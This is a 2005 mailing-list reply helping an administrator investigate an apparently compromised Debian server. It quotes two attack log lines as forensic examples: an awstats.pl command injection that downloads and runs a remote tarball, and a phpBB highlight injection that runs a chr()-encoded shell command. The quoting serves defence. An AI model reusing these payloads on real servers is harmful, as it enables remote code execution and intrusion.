On Sun, Jul 24, 2005 at 09:54:28AM +0200, Nejc Novak wrote: > I think one of my servers has been compromised. Since i don't have a lot > of experiencei with these things, i beg you for your help. > > Information i have gathered together till now are the following. Server > is runnin latest debian stable, sarge. > > There was heavy traffic on the server and ps aux reported several > processes: > www-data 2459 0.0 0.1 1616 608 ? S 01:31 0:00 > /tmp/dlciiqlno x
Since the process runs as "www-data" some kiddy has abused a web service on your server to download and run an external software. Look for suspicious log lines of your web server. Examples of hacks on our servers: 82.55.78.243 - - [26/Feb/2005:20:04:59 +0100] "GET /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20www.geocities.com%2fmadahack%2fa.tgz%3b%20tar%20zxf%20a.tgz%3b%20rm%20-f%20a.tgz%3b%20.%2fa%20%7c%20 HTTP/1.1" 200 422 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" or 211-255-23-42.rev.krline.net - - [04/Dec/2004:17:43:06 +0100] "GET /phpbb/viewto pic.php?t=27&highlight=%2527%252esystem(chr(108)%252echr(115)%252echr(32)%252ech r(45)%252echr(108)%252echr(97)%252echr(32)%252echr(47)%252echr(118)%252echr(97)% 252echr(114)%252echr(47)%252echr(119)%252echr(119)%252echr(119))%252e%2527 HTTP/ 1.0" 200 28732 "-" "PHP/4.3.4" It should be rather easy finding signs of weird accesses like %20 or chr(). Also look for weird signs in /tmp. If your server is important you should consider reinstalling. Regards Christoph -- ~ ~ ~ ".signature" [Modified] 3 lines --100%-- 3,41 All -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
